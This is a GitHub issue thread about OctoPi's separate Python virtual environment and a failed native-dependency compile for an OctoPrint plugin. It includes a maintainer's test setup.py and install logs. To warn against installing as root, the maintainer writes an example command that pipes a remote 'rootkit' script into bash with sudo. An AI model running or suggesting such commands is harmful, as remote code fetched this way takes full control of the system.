### ISSUE TITLE
two python on system, octoprint-pythin is missing -dev

### ISSUE THREAD

**Issue by MarcusWolschon** [guysoft/OctoPi#244]
Octoprint in the OctoPi image uses it's own
/home/pi/oprint/local/bin/python
   * It ignores python modules installed system-wide via the package system.
   * It does not include python-dev to add packages that are required by Octoprint plugins via the "plugin_requires" statement in their setup.py

Example:
A plugin with
``
   plugin_requires = ["RPi.GPIO>=0.6", "numpy==1.8.2"]
``
then run
``
   sudo /home/pi/oprint/local/bin/python  setup.py install 
``
numpy can't be compiled after download because basics such as python.h are missing
``
   _configtest.c:1:20: fatal error: Python.h: No such file or directory
 #include <Python.h>
                    ^
   compilation terminated.
   ...
   SystemError: Cannot compile 'Python.h'. Perhaps you need to install python-dev|python-devel.
``
of cause python-dev IS installed system-wide.

**Comment by foosel** [comment]
> Octoprint in the OctoPi image uses it's own /home/pi/oprint/local/bin/python

No, it uses its own `/home/pi/oprint/bin/python`. Not sure where you are taking the `local` from.

> sudo

Yikes! NEVER install ANYTHING in the virtual env with sudo. You do not need sudo. If you need sudo, something is broken (possibly due to an earlier misuse of sudo). Using sudo for package installation is a security incident bound to happen.

> numpy can't be compiled after download because basics such as python.h are missing

Sorry, but can't confirm:

```
pi@octopi:~ $ ~/oprint/bin/pip install numpy
Collecting numpy
  Downloading numpy-1.11.1.zip (4.7MB)
    100% |████████████████████████████████| 4.7MB 35kB/s
Installing collected packages: numpy
  Running setup.py install for numpy ... done
Successfully installed numpy-1.11.1
```

Took ages to compile, but in the end it worked. Tested on an unmodified OctoPi 0.13.0.

**Comment by MarcusWolschon** [comment]
Workaround for others, that can't get their Octopi plugins installed because dependencies listed in setup.py can't be handled:

/home/pi/oprint/bin/pip install numpy

**Comment by foosel** [comment]
Could you please share which plugin you are running into issues with and how exactly you are attempting to install it? Again, compiling dependencies with OctoPrint's virtual environment on OctoPi works just fine under 0.13 (and earlier version too for that matter), without any work around being necessary. A manual pip install of numpy or any other dependency is the same as what installing a plugin's additional required packages does.

**Comment by MarcusWolschon** [comment]
A new plugin.
It has a dependency on numpy listed in it's setup.py
setup.py install 
was supposed to take care of that dependency but complains that python-dev is missing with the error messages quoted above.

1) There already is a system wide python on the Raspian, so on a space restricted platform such as the Raspberry Pi OctoPi has no business in keeping a second Python around on the tiny SD card.
2) numpy was already installed via aptitude in the system-wide python since I developed a lot of test code on the command line outside of Octoprint first to verify the functionality of my sensors.
3) I did NOT manually install it via the pip of the python Octopi uses because doing that is the job of setup.py. That was just my workaround to get it working in the end but it is obviously not acceptable for any release of the plugin to regular users who only ever see the web interface and install plugins from there.


Could it be that my usage of sudo when running setup.py caused this? (I just didn't know any better. Installing software looked like something only root is allowed to do anyway.)

**Comment by foosel** [comment]
I don't know what you did, all I can tell you is that dependencies stated in `plugin_requires` that need a compilation compile on a stock OctoPi 0.13.0. I setup a minimal plugin to test this. `RPIO` has a native component that needs compilation and [fails if python.h **can't** be found for whatever reason](https://github.com/metachris/RPIO/issues/54). This is the test plugin's `setup.py`:

``` python
# coding=utf-8

########################################################################################################################
### Do not forget to adjust the following variables to your own plugin.

# The plugin's identifier, has to be unique
plugin_identifier = "plugin_test"

# The plugin's python package, should be "octoprint_<plugin identifier>", has to be unique
plugin_package = "octoprint_plugin_test"

# The plugin's human readable name. Can be overwritten within OctoPrint's internal data via __plugin_name__ in the
# plugin module
plugin_name = "OctoPrint-PluginTest"

# The plugin's version. Can be overwritten within OctoPrint's internal data via __plugin_version__ in the plugin module
plugin_version = "0.1.0"

# The plugin's description. Can be overwritten within OctoPrint's internal data via __plugin_description__ in the plugin
# module
plugin_description = """Just a quick plugin test."""

# The plugin's author. Can be overwritten within OctoPrint's internal data via __plugin_author__ in the plugin module
plugin_author = "Gina Häußge"

# The plugin's author's mail address.
plugin_author_email = "osd@foosel.net"

# The plugin's homepage URL. Can be overwritten within OctoPrint's internal data via __plugin_url__ in the plugin module
plugin_url = ""

# The plugin's license. Can be overwritten within OctoPrint's internal data via __plugin_license__ in the plugin module
plugin_license = "AGPLv3"

# Any additional requirements besides OctoPrint should be listed here
plugin_requires = ["RPIO"]

### --------------------------------------------------------------------------------------------------------------------
### More advanced options that you usually shouldn't have to touch follow after this point
### --------------------------------------------------------------------------------------------------------------------

# Additional package data to install for this plugin. The subfolders "templates", "static" and "translations" will
# already be installed automatically if they exist.
plugin_additional_data = []

# Any additional python packages you need to install with your plugin that are not contains in <plugin_package>.*
plugin_addtional_packages = []

# Any python packages within <plugin_package>.* you do NOT want to install with your plugin
plugin_ignored_packages = []

# Additional parameters for the call to setuptools.setup. If your plugin wants to register additional entry points,
# define dependency links or other things like that, this is the place to go. Will be merged recursively with the
# default setup parameters as provided by octoprint_setuptools.create_plugin_setup_parameters using
# octoprint.util.dict_merge.
#
# Example:
#     plugin_requires = ["someDependency==dev"]
#     additional_setup_parameters = {"dependency_links": ["https://github.com/someUser/someRepo/archive/master.zip#egg=someDependency-dev"]}
additional_setup_parameters = {}

########################################################################################################################

from setuptools import setup

try:
        import octoprint_setuptools
except:
        print("Could not import OctoPrint's setuptools, are you sure you are running that under "
              "the same python installation that OctoPrint is installed under?")
        import sys
        sys.exit(-1)

setup_parameters = octoprint_setuptools.create_plugin_setup_parameters(
        identifier=plugin_identifier,
        package=plugin_package,
        name=plugin_name,
        version=plugin_version,
        description=plugin_description,
        author=plugin_author,
        mail=plugin_author_email,
        url=plugin_url,
        license=plugin_license,
        requires=plugin_requires,
        additional_packages=plugin_addtional_packages,
        ignored_packages=plugin_ignored_packages,
        additional_data=plugin_additional_data
)

if len(additional_setup_parameters):
        from octoprint.util import dict_merge
        setup_parameters = dict_merge(setup_parameters, additional_setup_parameters)

setup(**setup_parameters)
```

I also created a folder ``octoprint_plugin_test`` with an empty ``__init__.py`` within next to it. Then I tested the install via ``python setup.py install``:

```
pi@octopi:~/plugin_test $ ~/oprint/bin/python setup.py install
Found packages: ['octoprint_plugin_test']
running install
running bdist_egg
running egg_info
creating OctoPrint_PluginTest.egg-info
writing requirements to OctoPrint_PluginTest.egg-info/requires.txt
writing OctoPrint_PluginTest.egg-info/PKG-INFO
writing top-level names to OctoPrint_PluginTest.egg-info/top_level.txt
writing dependency_links to OctoPrint_PluginTest.egg-info/dependency_links.txt
writing entry points to OctoPrint_PluginTest.egg-info/entry_points.txt
writing manifest file 'OctoPrint_PluginTest.egg-info/SOURCES.txt'
reading manifest file 'OctoPrint_PluginTest.egg-info/SOURCES.txt'
writing manifest file 'OctoPrint_PluginTest.egg-info/SOURCES.txt'
installing library code to build/bdist.linux-armv7l/egg
running install_lib
running build_py
creating build
creating build/lib.linux-armv7l-2.7
creating build/lib.linux-armv7l-2.7/octoprint_plugin_test
copying octoprint_plugin_test/__init__.py -> build/lib.linux-armv7l-2.7/octoprint_plugin_test
creating build/bdist.linux-armv7l
creating build/bdist.linux-armv7l/egg
creating build/bdist.linux-armv7l/egg/octoprint_plugin_test
copying build/lib.linux-armv7l-2.7/octoprint_plugin_test/__init__.py -> build/bdist.linux-armv7l/egg/octoprint_plugin_test
byte-compiling build/bdist.linux-armv7l/egg/octoprint_plugin_test/__init__.py to __init__.pyc
creating build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/PKG-INFO -> build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/SOURCES.txt -> build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/dependency_links.txt -> build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/entry_points.txt -> build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/not-zip-safe -> build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/requires.txt -> build/bdist.linux-armv7l/egg/EGG-INFO
copying OctoPrint_PluginTest.egg-info/top_level.txt -> build/bdist.linux-armv7l/egg/EGG-INFO
creating dist
creating 'dist/OctoPrint_PluginTest-0.1.0-py2.7.egg' and adding 'build/bdist.linux-armv7l/egg' to it
removing 'build/bdist.linux-armv7l/egg' (and everything under it)
Processing OctoPrint_PluginTest-0.1.0-py2.7.egg
creating /home/pi/oprint/lib/python2.7/site-packages/OctoPrint_PluginTest-0.1.0-py2.7.egg
Extracting OctoPrint_PluginTest-0.1.0-py2.7.egg to /home/pi/oprint/lib/python2.7/site-packages
Adding OctoPrint-PluginTest 0.1.0 to easy-install.pth file

Installed /home/pi/oprint/lib/python2.7/site-packages/OctoPrint_PluginTest-0.1.0-py2.7.egg
Processing dependencies for OctoPrint-PluginTest==0.1.0
Searching for RPIO
Reading https://pypi.python.org/simple/RPIO/
Best match: RPIO 0.10.0
Downloading https://pypi.python.org/packages/29/05/6884572923c57ff488fdf5c4ab887deb9edb2515afbcb49be087c95ac698/RPIO-0.10.0.tar.gz#md5=cefc45422833dcafcd59b78dffc540f4
Processing RPIO-0.10.0.tar.gz
Writing /tmp/easy_install-0vSloR/RPIO-0.10.0/setup.cfg
Running RPIO-0.10.0/setup.py -q bdist_egg --dist-dir /tmp/easy_install-0vSloR/RPIO-0.10.0/egg-dist-tmp-vwEjkq
source/c_gpio/cpuinfo.c: In function ‘get_cpuinfo_revision’:
source/c_gpio/cpuinfo.c:50:9: warning: ignoring return value of ‘fgets’, declared with attribute warn_unused_result [-Wunused-result]
         fgets(buffer, sizeof(buffer) , fp);
         ^
zip_safe flag not set; analyzing archive contents...
Adding RPIO 0.10.0 to easy-install.pth file
Installing rpio script to /home/pi/oprint/bin
Installing rpio-curses script to /home/pi/oprint/bin

Installed /home/pi/oprint/lib/python2.7/site-packages/RPIO-0.10.0-py2.7-linux-armv7l.egg
[...]
Finished processing dependencies for OctoPrint-PluginTest==0.1.0
```

Then I uninstalled ``OctoPrint-PluginTest`` and ``RPIO`` again via ``~/oprint/bin/pip uninstall OctoPrint-PluginTest RPIO``, packaged the plugin into a tarball and installed that via OctoPrint's plugin manager:

```
Installing plugin...
Installing plugin from uploaded archive...
/home/pi/oprint/bin/pip install /tmp/tmpgCJ3Oz.tar.gz
Processing /tmp/tmpgCJ3Oz.tar.gz
[...]
Installing collected packages: RPIO, OctoPrint-PluginTest
Running setup.py install for RPIO: started
Running setup.py install for RPIO: finished with status 'done'
Running setup.py install for OctoPrint-PluginTest: started
Running setup.py install for OctoPrint-PluginTest: finished with status 'done'
Successfully installed OctoPrint-PluginTest-0.1.0 RPIO-0.10.0
You are using pip version 8.1.1, however version 8.1.2 is available.
You should consider upgrading via the 'pip install --upgrade pip' command.
Done!
Close
Plugin "OctoPrint-PluginTest" installed
The plugin was installed successfully
```

So, as you see, `python.h` gets found just fine (and the location of the used python site-packages folder and executable path - which is a virtual environment basically is - is irrelevant for development headers anyhow), compilation succeeds, installation of plugin accordingly as well.

Whatever it is that's not working for you, it's not something that's broken on stock 0.13.0.

> OctoPi has no business in keeping a second Python around on the tiny SD card

Virtual environments are a means to get specific dependency versions to exist concurrently on a system, plus it gets around needing root (and hence sudo) to update the software or installing plugins. Some of the software versions shipped with stock raspbian are broken (the requests package [for example](https://github.com/guysoft/OctoPi/issues/155#issuecomment-159695290)) and can't be updated due to other dependencies or being provided by native OS packages and no fixed versions being available there. Installing application software globally is also frowned upon due to needing root rights to do so (setup.py of dependencies might contain harmful code - `sudo curl http://example.com/funny_rootkit.sh | bash`) plus introducing dependency issues across other installed system packages. So please don't tell me something has no business when there are multiple reasons to do it exactly the way it is done. Also - limited system resources? It's hard to even get SD cards smaller than 8GB these days, the virtual environment hardly makes a dent in that and disk space is the only difference with regards to system resources it makes.

> I did NOT manually install it via the pip of the python Octopi uses because doing that is the job of setup.py.

Yes, which is what I've been trying to tell you repeatedly now - executing `python setup.py install` with the included requirements and manually fetching the dependencies through `pip` boils down to the same process in the background. And as you see in both examples above, that installation and compilation of dependencies through `setup.py` works just fine out of the box. Whatever problems you are running into, I cannot reproduce them on 0.13 here. Also that would have been noticed way before since for example [the quite popular gpx plugin actually does have a native component](https://github.com/markwal/OctoPrint-GPX/blob/master/setup.py#L93), and that sees heavy use by the general population. If it was not possible to compile that through the regular plugin install process, pitchforks and torches would be at the ready.

Can you try with a fresh image? That would also rule out any issues introduced by the `sudo` abuse.

**Comment by MarcusWolschon** [comment]
lets just close the issue.
I got a good explanation on why there are multiple python instances in the image and aparently the cause of the original issue is found.
I can not try a fresh image. Too much work in setting up all the development happening on it again. (wifi networks, git sources, unfinished source code, helper scripts)

**Comment by foosel** [comment]
> I can not try a fresh image. Too much work in setting up all the development happening on it again. (wifi networks, git sources, unfinished source code, helper scripts)

That's why I have a couple of SD cards on hand (which is a good idea in any case, to allow for quick experiments and such things). You should also make a backup of your current card in any case if you did so much customization. A power interruption at the wrong time can make all the effort go to waste - I lost a heavily customized image this way last year thanks to a short power outage, with loads of IoT and home automation scripts. Still haven't fully recovered my steps, I wish I'd had a backup. Also the reason why I installed a poor man's USV (USB battery that acts as a pass through to the PSU). Just a friendly word of advice though.

> lets just close the issue.

Ok then.
